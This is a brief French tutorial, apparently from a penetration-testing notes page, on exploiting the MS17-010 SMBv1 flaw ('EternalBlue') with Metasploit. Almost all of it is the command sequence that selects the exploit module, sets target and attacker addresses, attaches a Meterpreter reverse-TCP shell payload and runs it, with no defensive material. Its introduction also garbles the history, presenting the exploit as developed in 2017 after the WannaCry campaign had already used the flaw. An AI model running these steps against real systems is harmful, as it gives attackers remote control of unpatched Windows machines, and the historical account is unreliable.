[Exploitation/Windows] Eternal Blue

Introduction

L'exploit Eternal Blue a été développé par la NSA en 2017. Il fait suite à l'exploitation de la vulnérabilité MS17-010 lors de la campagne de Ransomware Wannacry.

La faille est présente dans la v1 du protcole SMB et permet notamment une RCE.

Exploitation avec Metasploit

• Tout d'abord lancez la console Metasploit :
  

msfconsole

• Sélectionnez l'exploit :

use exploit/windows/smb/ms17_010_eternalblue

• Définissez les options :

set rhosts <TARGET_IP>

set lhost <LOCAL_IP>

set lport <PORT>

set payload windows/x64/meterpreter/reverse_tcp

• Puis lancez l'exploit :

run